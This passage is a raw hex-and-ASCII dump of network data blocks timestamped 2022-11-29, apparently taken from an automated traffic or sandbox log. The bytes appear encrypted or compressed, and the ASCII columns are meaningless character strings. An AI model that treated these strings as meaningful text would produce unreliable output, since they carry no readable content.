4d d7 7e 18 eb 14 a1 f5 4d 89 09 53 e8 fe 8b 2f 07 af be 86 40 5e f4
                                  Data Ascii: @]"?9Mot\}ZYZD8Q~{0^w>2^OXIpN"}u%.pceuh:+@NtF|kBI[hyjG<@\?Se62 Ki{J>E?cWw3C'8JMP\|#M~MS/@^
                                  2022-11-29 15:56:46 UTC2241INData Raw: db ae b4 7b a1 bc 16 58 d9 55 ae dd a1 cd 7f 0a a4 7b 5a 9b 03 42 06 c4 b4 e8 a4 79 50 c8 9e 86 bc c5 f3 01 1c 4e 9f e6 6c dd 6a 7e 7d ba 88 86 96 c1 a7 08 22 3f 90 73 3f 4a 15 69 d4 1e a2 55 c5 0b 6c 1e 0b cc 52 56 1e cb 40 c7 95 f4 a5 fe 46 68 a7 81 2f 9a 03 69 e6 6d 9a 24 18 f7 89 80 b4 f4 f6 b2 59 0f f1 9f e4 6a 19 2f 03 f1 4e 94 6f 52 27 5a 1a 7c cc 2d 5b 21 dc 97 d2 6e 93 89 e5 41 8e d6 96 d8 a7 5b c1 be 94 0e 0f 91 3d 1e 0a b7 33 5e b6 ee 34 7b 00 8a 9c 65 6d 7a 9b 55 8c 25 8d a4 47 5b e6 64 68 f9 81 b4 9a 97 5f 10 77 d9 e6 f8 50 ca 3c 20 b2 f1 d5 f5 45 3d 59 09 1d 2b e1 98 bd aa 82 6a 97 23 19 33 d8 ec b8 36 e3 f0 2e 84 dd 68 08 51 fd 38 52 4b 6f aa 53 10 5e d5 b1 46 8f 86 22 a5 50 3a 82 40 49 93 23 fe fc 38 99 e9 0c d5 a0 19 df 02 24 9d 31 88 41
                                  Data Ascii: {XU{ZByPNlj~}"?s?JiUlRV@Fh/im$Yj/NoR'Z|-[!nA[=3^4{emzU%G[dh_wP< E=Y+j#36.hQ8RKoS^F"P:@I#8$1A
                                  2022-11-29 15:56:46 UTC2242INData Raw: 3b 13 b0 ee 2f 18 30 06 f9 1d 0e e2 48 ab 0c 6d 40 40 02 64 93 c0 b1 3c 01 1d c8 e7 23 c3 c8 56 80 6d 98 05 b6 3c fb d1 fc c2 77 57 af 68 ba 79 9c 30 a1 f0 e4 d1 08 7a 4d c5 e1 f8 95 9b 09 f6 12 46 fb cd b0 7e 44 d7 ce e2 ca ce b1 51 11 86 c6 13 16 3d 0c 47 c1 3f 82 56 7a 7d a9 87 de 01 1e c2 34 4f 64 9a 4a 1a b4 12 63 bd 67 c8 b7 e8 ec cb 3e ff 12 5a 4f e8 1f e5 60 fe c7 3d fe 87 9e ec d1 cd 34 65 4d 25 25 cb b5 76 a4 04 8b a8 81 c8 1d 31 83 70 e9 23 d6 14 14 48 e0 b6 e7 77 60 5e e6 f9 05 e5 06 f0 d3 3a 86 4c 71 87 28 06 ed 48 ac 68 80 bf d0 0a 47 64 18 59 ff 6c 11 44 ec 4c be 8a 5e c6 d2 9d 10 b1 20 a4 86 6d 46 85 58 2f aa 4b 17 5f e6 3d 69 88 db f3 fc 5a 81 a5 31 c4 18 19 56 f5 7d 99 0c 57 77 e7 42 e7 22 02 f9 f7 df 6e ff b7 69 06 b6 86 b7 92 0c 0b 09
                                  Data Ascii: ;/0Hm@@d<#Vm<wWhy0zMF~DQ=G?Vz}4OdJcg>ZO`=4eM%%v1p#Hw`^:Lq(HhGdYlDL^ mFX/K_=iZ1V}WwB"ni
                                  2022-11-29 15:56:46 UTC2243INData Raw: b1 76 e8 a6 2b e0 ac d2 34 45 69 3b 0b 9b 31 d1 b9 67 35 36 e1 e7 c7 db 52 b5 12 40 43 38 07 db a4 99 1b bb e2 79 5b dc fe 47 f4 b1 7a 97 a5 0c d1 62 0f f2 1c af d7 9a d0 66 8c 1e 59 97 77 50 7e e1 a6 b0 3f 82 ae e0 d9 1b f4 94 19 7d 0d 09 35 9b 57 8e 03 85 e4 9f 26 e3 89 ed 7e 76 7b 8d c2 4d c2 f1 a6 3d 1b 4a d8 29 0c c5 2c f0 77 fa bb 47 8f e1 fe 36 6d d3 17 88 27 89 82 8f 4e f2 f9 b2 bb 03 87 ed 62 2c 31 c8 91 49 a4 81 c7 cf 63 67 e8 98 f5 e9 ea a5 a4 58 37 ff 22 d7 54 7f ab 2a 06 74 7e 56 64 7e 49 fa 6d 0a f3 fb 01 80 0f 6f 71 a4 a7 d2 96 fe 2c 34 0a 41 a4 1d a2 ab 0e ab 7d 54 9e 5f 70 3c 28 3a 70 a7 89 c9 ee b3 85 c3 19 0d 67 03 0b 8e 19 1d b2 92 11 ec b6 d4 7a 81 80 43 dc 42 6e e5 91 dc e5 f3 ef 95 bb 6c 6c c5 6e 99 a4 3f 38 41 c3 f7 4f 41 b6 15 28
                                  Data Ascii: v+4Ei;1g56R@C8y[GzbfYwP~?}5W&~v{M=J),wG6m'Nb,1IcgX7"T*t~Vd~Imoq,4A}T_p<(:pgzCBnlln?8AOA(
                                  2022-11-29 15:56:46 UTC2245INData Raw: 4f ba 30 3a eb 00 aa 12 4b dd df 20 c2 c5 b6 e4 93 f9 0a 70 ab 5c 11 57 2e ab d8 0b 25 64 8c 29 3a 14 23 a0 ce cb ce 6f bd 7c 2e 52 c1 93 c0 ff 19 07 9e d4 95 83 aa 41 ed 9f 66 52 66 04 f6 03 93 60 67 ba e5 7f 42 8c f2 63 63 18 8f 3d a3 9d a5 93 7f c0 58 eb e4 dc 52 1e 63 8f d6 f9 4f 77 7f d1 ac b7 5d c3 6e 10 ed b3 30 96 35 99 91 cc 06 18 2c aa eb ce fc a3 ba 71 6e e5 69 77 60 34 56 1c c5 ee af 37 f9 57 94 f9 9b 95 7b 0b 7b 44 31 68 63 e5 80 b5 66 f2 82 60 74 dd 01 4b 1a a9 6f 4b 18 27 b8 8c e2 ee a2 b5 a9 43 d8 8a 7c 05 39 01 b5 61 30 2d 76 e8 f8 6c ee 25 1d 03 46 f7 ba 89 87 9d d6 4d ce 37 08 05 a5 26 aa f2 64 db 48 ed d8 f8 b9 9b 7f f6 56 33 c1 31 e1 fa a8 db 9c 8b b5 64 9f 7b 85 a0 f2 ca cf fa b8 4e 98 33 97 22 9e 9c 8f 6f ee f7 26 e9 e3 fa 11 fb 3d
                                  Data Ascii: O0:K p\W.%d):#o|.RAfRf`gBcc=XRcOw]n05,qniw`4V7W{{D1hcf`tKoK'C|9a0-vl%FM7&dHV31d{N3"o&=
                                  2022-11-29 15:56:46 UTC2246INData Raw: 95 94 50 84 fb f8 29 1d e8 1e c7 d7 08 f6 3f 26 25 b4 e7 29 24 01 2d 90 8d 84 1b 78 be c5 09 9f f9 bc bd a7 d1 44 72 01 09 b7 f2 be a6 63 f5 08 87 91 58 f0 6a 84 b6 fe b7 1b 51 83 ce 76 50 92 32 dd f3 57 1a 24 e4 fb d9 f1 cf 88 93 9d f4 e8 14 a1 52 4f 8a 7e d4 69 90 b5 c2 d2 f1 7e a2 2f 0c ce 8a 09 86 89 86 1d 0a 91 bb 2a d8 5e 84 11 aa 57 0f db 61 9e b6 3d 42 ff 34 49 51 69 ee fd 73 8d be b6 56 f3 e3 fe 4f a5 0a 4e 24 15 b3 2d 0a 8b 6f d6 1a 7b be 77 a8 4a 9b 07 5d 48 4b b9 09 46 c6 5b 39 d6 28 b3 80 00 eb 41 70 60 44 58 ba 72 23 1f d9 97 95 ea 34 95 8b 47 06 fc 8a 4d e2 77 cb d7 04 61 18 e5 20 77 17 bf 8f 12 9d 49 a7 dd 99 8d ba 4f 50 14 ee cd af 6f 15 df 6c b8 3a 71 09 69 04 06 9e cf 67 25 8f 23 03 ca 07 0c de 5d 45 4b 05 9e 1f bf fa 36 2b 23 f2 49 dc
                                  Data Ascii: P)?&%)$-xDrcXjQvP2W$RO~i~/*^Wa=B4IQisVON$-o{wJ]HKF[9(Ap`DXr#4GMwa wIOPol:qig%#]EK6+#I
                                  2022-11-29 15:56:46 UTC2247INData Raw: 24 f6 04 01 0b 2a 5a 95 25 b8 94 31 4e 31 01 75 9c 13 2a c0 17 18 b7 52 9d cc 90 db 2a 6e c6 be d1 66 ee f3 34 a7 f0 a7 99 28 93 33 62 fe 38 a7 45 60 fa 2c 23 cc 7a b7 ee 98 25 8b 2b b6 b8 87 39 7a aa 4a b0 3c c6 a8 71 4d 0b 3d bd 9a e7 05 33 cc 8a 02 a6 8c ab c5 5e 4d 89 48 8d 57 00 86 cd e7 15 09 e9 41 59 be 0e 83 8a ef 25 f6 79 27 dc 8a 6b 04 47 8f aa 0b 60 27 cc de 35 79 a7 3f b9 f4 85 22 09 48 b3 43 2d 35 60 a5 2d 51 8f 89 78 09 15 dc 2a 35 8b f9 6b 9c a6 36 e6 95 3f 03 fd 5b 7f 1b e8 b6 1d 80 52 8f bf 7c 4d f5 8e 07 31 be 82 c7 c9 b8 73 fc 48 2b 87 1b 10 e2 93 05 ec 64 05 58 d2 45 2b ec 89 77 16 55 a8 0d 2c f5 db 9d d8 ed 65 7c aa d1 42 2a a3 79 68 f0 da 8a c1 3f 06 fe c5 c6 16 4b 15 ce b8 31 da 0e d6 e5 c2 2c 84 7e 0a 93 81 87 5d b8 38 f2 57 79 80
                                  Data Ascii: $*Z%1N1u*R*nf4(3b8E`,#z%+9zJ<qM=3^MHWAY%y'kG`'5y?"HC-5`-Qx*5k6?[R|M1sH+dXE+wU,e|B*yh?K1,~]8Wy
                                  2022-11-29 15:56:46 UTC2249INData Raw: 53 0c 57 be dd 92 7a b5 1c cf 58 1a db 80 61 f2 0a 53 df 5c 57 5f 93 f8 a2 74 90 d4 27 ae e6 97 38 67 e7 3d b2 a0 1d c1 b7 53 d6 ed a3 7c c3 f0 a5 95 5a 6e 7b 7c c6 c7 74 82 1b cc c5 7a 3e 2e 99 a8 b4 c9 24 a5 de 39 4a eb 41 3f 73 6a ce 85 e5 f4 ce 2a 44 e7 e7 f9 bd a8 3e e8 24 f4 15 1e cd ab 0a ec 4d e2 98 0e ef 31 77 a2 f9 ac b9 ac e8 97 83 18 63 7d 1f 3d 70 4c 30 3b b7 e4 08 03 72 c6 fe cd 5c ff 6d ba a2 c2 12 ec dc 7f da 7f b3 59 f4 f6 04 49 b0 0a a7 2b 4b 6d 3e 34 a1 d6 51 f1 5e 6b 16 c2 17 3f 3b e3 52 03 77 56 ba 35 6a a5 8c 55 9f ab 3b 25 77 0c 77 5c 25 fd d7 d6 42 8f b1 3d cb 92 2a b9 ba 82 94 66 6d 17 2e 0f ee c6 2b aa 75 24 6e 31 9b d0 75 ff 46 6d b6 b3 57 a7 2d 21 97 89 2b 6b da b2 f4 59 59 06 e9 2d 61 24 7c 49 af 96 11 46 df f8 d0 77 b3 87 3e
                                  Data Ascii: SWzXaS\W_t'8g=S|Zn{|tz>.$9JA?sj*D>$M1wc}=pL0;r\mYI+Km>4Q^k?;RwV5jU;%ww\%B=*fm.+u$n1uFmW-!+kYY-a$|IFw>
                                  2022-11-29 15:56:46 UTC2253INData Raw: 8e 7f d9 d6 cf 8c bf 2e 39 72 27 d1 3d e6 21 65 07 99 e7 41 72 64 0e cf ea 87 ce 69 74 29 e2 c8 5e 1b 35 b3 d8 b5 27 a7 d1 18 b1 3b 0f f6 26 b9 52 0f 99 1a e8 40 21 23 cf 6e 3c 5d 40 97 f5 9c 89 0c 73 24 1f 33 b9 19 2a 1a b4 c6 9e 74 e8 59 a2 62 45 09 b4 94 5f f8 b0 56 01 53 21 c4 11 53 41 be 93 6f 92 7d 07 5a 1c 5c a9 f8 06 5e 43 a4 f4 68 00 2f 11 44 da 91 11 a0 c4 dd ad 5e 5e 82 29 bb df 2b ef b0 89 b6 76 19 7f 80 4f 2a 8c ff 6c 23 63 51 ab b9 e2 92 fa 10 2e 88 0b 66 3d c3 98 d1 57 54 95 94 ec ce fa b6 3d 95 81 6c 94 0b 42 b4 1e 4c 10 da 3f 36 87 a8 87 c9 b8 dd 96 0f bc d0 59 49 37 12 4a 91 ae a0 6b ca d1 a0 ed 01 11 ae 12 d3 f8 ae f3 c7 55 66 f5 bf c9 83 1e 5e 29 65 3a a7 a4 3b e0 1c d0 31 31 84 a1 63 a5 af 0b 2e 50 a0 ed ee 3e 71 18 9d c8 ef f0 ba be
                                  Data Ascii: .9r'=!eArdit)^5';&R@!#n<]@s$3*tYbE_VS!SAo}Z\^Ch/D^^)+vO*l#cQ.f=WT=lBL?6YI7JkUf^)e:;11c.P>q
                                  2022-11-29 15:56:46 UTC2257INData Raw: 99 80 1e 02 02 48 d8 9f 26 75 05 ec ec a5 2a f1 43 43 82 ae 3c 82 37 19 94 a9 2e fa 48 e5 5a 21 42 b4 b7 57 58 02 4e 08 d7 a5 b8 3e 71 a8 22 85 48 0a 99 25 d3 16 12 1c 46 ff 5f ea 95 d2 6d 15 14 e2 65 2c b2 60 1b c5 95 1c 1c 87 25 7a 6b 56 7e fb 0a 00 27 0a ab 84 e7 b4 fa b6 fe dd 66 4b 46 59 58 c5 50 94 50 82 77 90 5e 4d 0b a5 e6 96 7a 7e 76 97 b2 05 c3 fa f9 4b 06 7f 52 1e 85 a3 74 fc 1c 52 7b 86 11 89 d6 ea 24 c6 1a 14 7c df 09 f2 d9 9d 01 bb 04 02 99 3a b7 d3 b2 c8 92 de 1c c8 77 8f 59 51 12 4a 11 08 f8 9b 64 ea c5 8c 0b cd 9c fc 16 0a 83 b8 af f3 98 23 d9 fc a7 7a 31 71 94 19 22 8b 13 bc 41 26 d6 b7 2d 13 d4 6e 46 bf 2b b5 65 1d 85 ef 09 24 c7 2c d0 1a a9 8f 9f 6a 5b 7b 97 fd 26 fd 09 9d 48 02 2a 95 c0 95 80 46 77 b4 d9 62 15 dc 8c a5 5a 3e cd 62 7c
                                  Data Ascii: H&u*CC<7.HZ!BWXN>q"H%F_me,`%zkV~'fKFYXPPw^Mz~vKRtR{$|:wYQJd#z1q"A&-nF+e$,j[{&H*FwbZ>b|
                                  2022-11-29 15:56:46 UTC2259INData Raw: cc 6d 51 26 2f 66 34 e1 fb d4 a7 95 c9 84 21 19 78 f1 29 4b 1b eb a2 20 62 12 d6 0e 43 cd 2c 97 9a b7 66 f8 e5 fa e7 51 67 0f 91 30 08 03 a1 2f 3b 46 22 3d 07 b0 2f bb b7 6e 70 5b 6f 37 97 07 bd 5b c1 5d 29 55 6a 16 cb 8f 2d 10 02 d6 e6 51 7b 85 0c 71 06 5b 46 2d 27 40 25 17 ff 6d f9 b4 c1 f9 22 be 4b 70 9d 04 87 07 06 1a 9c fc 3d de 79 da c4 0b 16 2c ea 00 df 08 84 04 ab fa b2 2c b8 97 ac b2 f1 c7 47 8d 08 43 37 2a 5d 06 ab dd b3 86 01 cc 4f 1c 26 82 01 a4 e3 99 76 86 22 fc 8e ec 5d eb 74 ca 31 8a 38 6d b1 b6 41 50 72 96 8b 76 32 0a f2 36 db 6e 8d 83 19 62 ca f9 94 68 39 96 38 d3 0b fc 09 9a fe b0 1a 7d 0c 88 13 e2 e4 78 77 a6 e5 f5 62 58 84 ec 05 3e a1 41 ec 1e 61 e1 40 9e 09 d2 47 6c d4 99 24 52 db cc ae 0a a6 82 86 d3 a9 84 6a 3b 46 98 ba cc c6 f5 67
                                  Data Ascii: mQ&/f4!x)K bC,fQg0/;F"=/np[o7[])Uj-Q{q[F-'@%m"Kp=y,,GC7*]O&v"]t18mAPrv26nbh98}xwbX>Aa@Gl$Rj;Fg
                                  2022-11-29 15:56:46 UTC2263INData Raw: 85 70 8b ae 70 de 38 b7 b5 10 f0 b6 5c f4 e1 85 59 68 92 fa 5e 1e 19 4b 17 55 3a a7 48 a2 07 c9 4d 79 1f 5f 12 20 ef 45 42 86 0e ac e3 38 0c 30 55 c9 07 c1 3f ef 43 9e eb 01 69 fd dd 87 b6 b7 15 f1 36 19 2d fd ff 3d 18 20 ad 8f 71 03 94 38 b7 a8 2e ba cf f1 a2 34 53 e7 3c 68 71 aa 0b 2e 08 78 9a 17 cc f4 51 ed cb 8e c1 9c 58 23 d3 a4 dc d8 9d 8a 08 cb 68 7e 46 8d 59 77 d8 ed e7 ed a2 14 3c 27 00 70 52 2f 57 42 06 1b 95 c8 4a d0 2d aa 80 a4 68 46 ce 27 d4 ab a6 a9 34 92 be b5 a3 5f 95 23 3e 90 51 0d 1e 0d 02 fa e4 be 09 a7 df 58 8b da ae 3d 26 b7 6e 1a c8 93 c9 5b b7 22 90 dc c1 b6 aa c8 f4 3a 2d b1 f9 cf 86 cb 86 6a 72 4e f9 bb 40 1d aa 36 be 11 35 0f fa 9d 12 3b f6 77 1a ba 8e 9c 8a 44 7f 1b 3b 09 36 da 05 9b d2 4f 13 27 e4 be b6 0d c3 db 70 3c 87 0d a9
                                  Data Ascii: pp8\Yh^KU:HMy_ EB80U?Ci6-= q8.4S<hq.xQX#h~FYw<'pR/WBJ-hF'4_#>QX=&n[":-jrN@65;wD;6O'p<
                                  2022-11-29 15:56:46 UTC2267INData Raw: 49 b0 9c 37 3d 82 c4 31 04 96 ed 5c 1e 05 87 e3 54 fc fe 19 1f bb e2 8e 8e 58 8e 59 d2 8d a9 51 29 87 9c c2 a2 cb 20 64 d9 ed 98 2f e7 b2 9f 9a 5c 4c 67 34 77 f2 d1 21 8b 82 ec 8f 3f 8d 85 67 e1 ae 5b b7 af a3 6d a4 cd 72 d2 7d 9d 17 33 ec db 55 c1 9c 7b 67 77 d7 ad 53 ae 92 19 37 14 89 87 bd 3c 8c 24 a7 1a ff c5 45 64 b7 6b a6 ef e4 53 ae 58 dc a8 f7 1b ba df 78 dc f8 58 a3 58 94 24 32 69 41 e6 be 85 46 ca ce d6 50 f8 43 2a b2 22 fa 43 d5 54 55 84 9e 56 d0 a4 fe f3 83 14 32 3c 1a 36 e0 61 c3 97 38 fa a5 27 e7 18 8a ee 28 5d 22 e3 a6 1a b7 be 03 5a 4e 2d d5 2a d4 9c 87 93 94 76 05 84 21 67 8d 96 6a 06 be 8f f8 c8 c0 a4 80 d7 ed 6f 4c f4 99 72 a9 86 93 62 88 e4 52 f7 f6 77 cd c0 c6 e1 08 a1 02 55 6b 2c d7 1a 94 01 4a a0 e4 c9 62 3e 13 92 f9 28 94 68 76 7c
                                  Data Ascii: I7=1\TXYQ) d/\Lg4w!?g[mr}3U{gwS7<$EdkSXxXX$2iAFPC*"CTUV2<6a8'(]"ZN-*v!gjoLrbRwUk,Jb>(hv|
                                  2022-11-29 15:56:46 UTC2272INData Raw: af ef 16 51 3c 57 55 df 96 b4 c0 ea bb 68 5c 39 36 56 72 ce 7d 31 13 58 fe 2d 1c 6e 80 fd 08 09 95 11 f3 9b d1 5f 11 ea 9b 25 be 0c 39 f4 e9 09 d0 9f 06 97 c6 e0 8c 69 90 7d 9a 43 f1 b6 74 9c d0 fa e0 2d d0 2d 27 af 6c 92 87 eb 13 c5 09 ff 25 f4 07 0c 33 fb 72 b6 24 20 3f 12 c6 84 82 c0 7c ee f6 91 5a ec c3 b9 2e d6 04 3d 58 19 27 fe 98 06 c7 e9 2f a5 76 34 c4 40 ab 29 2a 70 34 86 fe ba ce 5b cf 60 6b 1a 66 75 e3 3c db a9 da d1 3c cf ca 17 73 91 29 30 8e 70 2d a7 c6 ae 51 61 19 5e c0 34 69 b5 94 26 42 b2 de 5c 6d a4 b0 c2 72 45 4f f1 94 5c 48 ab 21 86 a0 e8 95 0f 2f 01 80 3d db cc 25 cb 5f 1e 40 67 b5 c3 3e 83 b1 cb 5b 44 af d9 51 aa 69 bf 76 af 53 d7 1e 88 d3 8e 30 35 d5 b4 0c 49 c1 44 e8 df ed f3 7d b6 ed fc ef ab 4d 60 63 5b 51 ed d5 71 75 30 38 f9 b9
                                  Data Ascii: Q<WUh\96Vr}1X-n_%9i}Ct--'l%3r$ ?|Z.=X'/v4@)*p4[`kfu<<s)0p-Qa^4i&B\mrEO\H!/=%_@g>[DQivS05ID}M`c[Qqu08
                                  2022-11-29 15:56:46 UTC2276INData Raw: 84 ea 88 89 2a f6 99 79 47 40 06 4c d6 3c 3d d8 66 59 7b 76 bd fc 80 5d 42 cf 73 1e 34 61 dc 9d 6f a1 bf ba 5d e8 6c d0 74 cf e4 e2 59 26 46 cb 0c 87 bf cf e6 d5 ed ce 2e 39 9a f5 23 52 b4 39 ce 8d 1a 46 9f c3 f6 2c 9d e9 47 50 6c e1 55 c1 7e d2 3e e3 dd bc b9 75 29 a2 e0 b9 26 6f dd a5 37 d1 75 c0 1e 69 5b c9 62 5d b1 52 10 3b c4 28 b3 42 ad c8 20 cf 9e 4f cc 66 d4 48 2f 64 ba 61 ba 4f cf 69 85 96 b7 8c ce a9 01 02 ff 25 d6 58 c1 37 e5 f7 20 05 4b 74 76 88 9c dd 10 1d 1f c0 a2 ea a2 36 85 72 b9 15 d6 99 17 5b ec 91 ee 7c dd 4c c2 b8 5e 5a 40 9f ca bd 39 2a b4 10 fa e5 05 4f 2b 48 f3 a5 9f a1 66 8f ea aa 00 d8 de 14 d4 de b4 cf e4 2c 9d 41 0a 4e 12 f2 4d ee 95 d5 63 26 2d a7 29 ed c2 98 a8 11 30 76 0f fa 25 71 0b 1e 94 e4 9d 31 7b 3e 70 11 b9 c5 1f 1f f7
                                  Data Ascii: *yG@L<=fY{v]Bs4ao]ltY&F.9#R9F,GPlU~>u)&o7ui[b]R;(B OfH/daOi%X7 Ktv6r[|L^Z@9*O+Hf,ANMc&-)0v%q1{>p
                                  2022-11-29 15:56:46 UTC2280INData Raw: 6b 0d ea b8 59 36 c0 31 32 ef 56 4f 18 e5 18 7e 55 27 8c 43 02 47 46 15 c4 57 c0 8b 11 96 f4 4f d3 d0 c2 d2 d7 49 1d d2 ed 40 14 81 08 67 25 b4 b4 80 a3 2d 92 2b af ba 1d 69 85 1b f5 91 45 a8 0d 8f 1f c5 67 58 54 5b 70 c2 09 66 f3 c4 f4 c7 c6 a9 27 33 51 0e b1 a4 82 04 6a 03 5b 32 9b 6b 2d 7b f1 fd 41 c1 e0 25 af 5b 6d fd 39 ea 77 0b cd a0 97 4d d1 e9 fa c3 58 55 f1 5b 02 16 a4 33 54 5c 4f b2 7a 56 20 52 90 2a 5d b9 4b 47 1f 13 44 d7 c1 f1 23 f6 ac 29 af 34 33 ab 76 b4 65 51 df 41 9e 39 80 23 4e 45 3c a8 95 d6 52 f4 20 63 dc 53 a1 a9 d6 f9 07 c8 4b e2 54 9b 5b ae 32 a8 54 08 b2 46 87 4d 45 73 12 59 44 88 3e bb 10 b9 fc a9 93 16 81 50 74 35 f9 43 8b 3a fa 19 08 fb 2b b6 7b 41 bf 61 10 5d ed 0e 39 43 3e 9c 7f 37 be 5c f4 ae 57 71 26 7e 33 2f d4 f4 2a 28 93
                                  Data Ascii: kY612VO~U'CGFWOI@g%-+iEgXT[pf'3Qj[2k-{A%[m9wMXU[3T\OzV R*]KGD#)43veQA9#NE<R cSKT[2TFMEsYD>Pt5C:+{Aa]9C>7\Wq&~3/*(
                                  2022-11-29 15:56:46 UTC2284INData Raw: 57 45 37 fb d5 ca 16 cb d4 d1 e2 9b f6 17 40 ae 2d 56 fa 5c c8 d2 c0 61 43 8b ff 08 fb d3 84 5b 90 19 57 17 9a 20 77 c2 97 f6 f5 89 ad c8 d3 14 29 98 dd 43 8e 58 e8 64 30 b0 7e de 66 f1 72 e4 8f 5b 8a df 7b f9 bd 14 59 e8 5a df 4e e7 ab e7 ab 23 8b e3 d0 8b 6f fa d6 e3 f9 88 d2 29 d6 4d 05 26 cd 61 77 c5 65 ed 4e ac ac 42 e5 f9 13 e5 b6 63 4e 0a fe 74 c8 4a e9 d7 f3 3e 0c 34 44 68 6c 02 07 de b2 3a d8 94 cf 5a 08 91 3e 58 50 18 3c a1 de 90 d5 7c 54 bc 84 d0 b8 43 56 68 3c 71 db 23 02 47 7b 43 98 ed 1d 5c 12 b7 8c 1c 12 20 42 4a 49 67 03 06 4d d7 06 81 ad ee 87 fa 37 c3 7b f3 3d 2b 96 20 c3 8a 35 aa 5c b7 af 78 27 07 f9 0d 0b 5a 52 fb 93 56 39 a4 4c 7f 49 59 f4 48 69 b7 5f f2 10 2d 27 d7 c5 c2 70 cf 27 80 79 f6 82 7f cc ce 71 f0 43 49 8a 1d 0a 13 1e d1 62
                                  Data Ascii: WE7@-V\aC[W w)CXd0~fr[{YZN#o)M&aweNBcNtJ>4Dhl:Z>XP<|TCVh<q#G{C\ BJIgM7{=+ 5\x'ZRV9LIYHi_-'p'yqCIb
                                  2022-11-29 15:56:46 UTC2288INData Raw: c7 ac bf 63 80 7d 1e f9 86 f9 ea f0 26 16 1a 73 61 ec 37 bb f0 c4 a4 c0 50 e0 8f 2c 6a aa 6e 9e b5 9d ca c0 87 f1 87 e5 f2 37 30 15 33 50 60 c0 13 5c 2b 5c e8 da 90 e7 5e 54 36 ea 67 7e 70 50 d7 17 93 25 d2 e5 71 ab d7 74 cb 58 c7 39 04 5d c8 fb ec 35 b5 97 f2 2b 34 1b f3 52 bd 61 bd 55 0a 6c b6 a5 cc f4 bf 79 ad d9 df 8b fa 92 1f 51 81 d3 e0 b1 94 ee 64 5c f2 e6 34 79 a9 e8 60 1c fa 9b 61 ad 7d 0b c9 df 85 d8 ef 4c 42 6b 10 37 b9 21 f8 b3 4e de 1f 50 3e 0c 0e a8 27 d4 9b 63 49 c2 ed b1 f0 4e 81 ae c6 9e 97 c4 ee 0b 92 37 e1 d0 b4 db 6a 13 86 fb 26 1b 79 f4 ef e4 00 3c 0b 6d 6e 50 80 de 50 ef 5f 70 4c 12 05 a3 05 7a f7 6e 5f 66 86 a8 10 09 1e 09 8f 71 5e 40 cc 40 6d 61 a0 20 9a 05 81 f8 ae 47 5e 6d 89 4b 79 df 19 5e 8e c7 f0 f1 4c 5c 2b 38 dd f0 2b 30 d3
                                  Data Ascii: c}&sa7P,jn703P`\+\^T6g~pP%qtX9]5+4RaUlyQd\4y`a}LBk7!NP>'cIN7j&y<mnPP_pLzn_fq^@@ma G^mKy^L\+8+0
                                  2022-11-29 15:56:46 UTC2291INData Raw: d4 65 d5 9e 64 36 4c 50 e7 28 99 27 28 8f 61 55 ba 01 24 c4 02 9d 7e 36 49 75 d6 80 08 d9 ec e4 a6 9a 56 29 17 69 c1 a0 81 07 53 90 a5 35 ec 0f d8 90 18 5e e4 6b ad 59 12 83 8f fe af 52 72 41 02 c8 80 7f 52 14 9d 2f 8f 17 94 16 97 06 d8 00 0e 0b 6d b8 e8 8f da 48 26 ec 0d 1d 7f e9 69 f0 02 f5 aa f4 b9 12 71 a6 16 f7 52 a3 8b 55 2e a6 c1 be e6 ad 76 ee 81 a9 b6 5a 0d 3e 94 30 c6 ef c8 5b e3 2b 28 90 3f cb dd d8 15 af 50 67 8c cf 4d 04 e1 e6 12 45 90 ab f9 8d b8 a9 a4 f8 b4 27 79 77 de 65 b9 e5 e1 e5 f5 c3 fd ec 39 7b 20 e4 ee ca b9 ef d6 29 78 ce 57 f6 58 b6 34 8b 63 6c ac cd 62 b8 e8 a8 16 12 e3 c6 e0 f5 09 68 0d 1a fd f4 b2 9b 58 1c 54 cc 2f ba d2 a0 ad 10 26 7b 03 43 42 66 12 4f 28 19 bc 16 a2 62 b6 90 a3 9f 00 91 9b ce e4 39 78 15 49 14 31 5a 2f 9f 23
                                  Data Ascii: ed6LP('(aU$~6IuV)iS5^kYRrAR/mH&iqRU.vZ>0[+(?PgME'ywe9{ )xWX4clbhXT/&{CBfO(b9xI1Z/#
                                  2022-11-29 15:56:46 UTC2295INData Raw: 83 8a b0 5b 95 78 c3 72 a0 19 37 10 db e0 cf fc 63 a1 e0 77 a4 bd e4 3c b0 74 8c 3e 0e 5d 98 6f f6 f8 05 c7 1b 14 e6 e0 5c ee 80 d3 9f 97 0a ef a8 f2 b4 72 44 c2 ad cf 69 e0 34 de 25 1c d1 0b 4c a4 fa 1e 74 36 43 e4 25 c4 74 72 4b 77 ab 36 f3 b8 64 16 26 5b 9a a5 1b 3f 96 b8 f8 a5 3c c7 fe f7 c5 f5 e3 56 79 5d 8e 66 74 46 43 f4 f1 cd e6 af 66 d9 67 05 2e dd 9b 96 b8 20 81 bd 53 ab 34 c5 09 12 7f c2 63 0f b0 38 54 0e f7 ea e8 6c 54 76 e5 13 3e 17 1f 11 6c 18 78 7d 91 e4 f1 51 5b 8c d6 68 59 cf d8 1c 80 c2 f3 1e a9 44 d1 66 e8 da ff 70 d9 84 3e fe 9b 08 7c 07 af 77 65 e6 87 69 d8 53 41 56 9f 0e cb 76 7d 57 7b 14 52 86 ec e9 14 7d d8 90 91 c2 50 d1 d5 85 ea 51 af 47 dd b1 36 ec 82 00 53 5b 66 f7 04 43 7d 41 02 f6 00 65 73 c9 a3 ef a1 4c 64 00 b2 15 36 c4 36
                                  Data Ascii: [xr7cw<t>]o\rDi4%Lt6C%trKw6d&[?<Vy]ftFCfg. S4c8TlTv>lx}Q[hYDfp>|weiSAVv}W{R}PQG6S[fC}AesLd66
                                  2022-11-29 15:56:46 UTC2299INData Raw: 27 ab 53 15 91 7d aa 5e 21 3b 0c 00 b4 e7 0f b1 6d 56 e5 3f 65 54 11 8f a3 e1 47 2d 3c 76 30 b6 55 0c 61 7e ed 5d e7 99 b5 23 60 ca e9 10 c2 2b 9e 99 a5 a7 7c 1a f8 82 d5 d0 bf d1 f6 a0 7e 16 c6 7d 22 66 c2 b0 d5 49 de 20 95 bb e5 fb 86 fc fa d5 c4 1a 7e 51 5d fa 85 7e 23 26 88 c0 40 66 1b d9 c5 6f cf bb 82 d9 9a 2e 45 0e 9c 2b c5 6f 42 ce 23 cc 91 03 ca cd 1f c1 6c e1 d4 2d a2 94 18 c9 b0 45 8f dc 8d 56 9f 6f a9 33 02 16 2d 56 4b f4 4c 04 ab 09 0f 59 83 d8 6a 8f e3 86 71 0a 1d ae b0 fa 6d 1c bf 36 f2 2c b2 c4 3e 6a 6c 92 a4 cf 97 62 9f 37 f2 ba 96 e8 2d 